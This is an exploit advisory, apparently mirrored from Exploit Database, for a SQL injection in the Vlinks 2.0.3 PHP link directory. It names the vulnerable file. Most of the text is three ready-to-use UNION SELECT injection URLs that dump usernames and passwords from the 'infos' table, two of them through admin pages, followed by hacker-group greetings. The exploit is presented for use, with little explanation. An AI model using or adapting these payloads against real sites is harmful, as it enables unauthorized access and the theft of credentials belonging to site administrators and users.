Vlinks 2.0.3 – ‘id’ SQL Injection

• Exploit Database
• 86 阅读

• 作者： JIKO
  日期： 2012-08-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/20859/

• #########################################################################################
  [!x!] Informations:
   
  Name : vlinks
  Download : http://www.vlinks.org/ =>http://www.vlinks.org/telechargements/Vlinks2.0.3.zip (And All Version)
  Vulnerability: Sql Injection
  Author : JIKO(JAWAD)
  Contact: jalikom@hotmail.com
  Site : No-ExploiT.CoM (Is Back)
  Notes: No-ExploiT.CoM Miss
  #########################################################################################
  [!x!] Bug:
   
  Bugged file is /[path]/page.php?
   
  [Note]
  Pass Simple
  [/Note]
   
  #########################################################################################
  [!x!] Exploit:
   
  Exploit: http://no-exploit.com/forum/site.php?ps=1&idc=1&id=-991 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6,7,8,9,10,11 from infos--
  
  [Admin Panel] ! Need Login
  Exploit: http://no-exploit.com/forum/admin/admin_modif_categorie.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2 from infos--
  Exploit: http://no-exploit.com/forum/admin/admin_modif_partenaire.php?id=-1 union select 0,concat(pseudo,0x3a,passe),2,3,4,5,6 from infos--
   
  ########################################################################################
  [!x!] To: All friends
  Cyber_Devil Allah with you
  
  members [No-exploit.Com] 
  

  Python

  Copy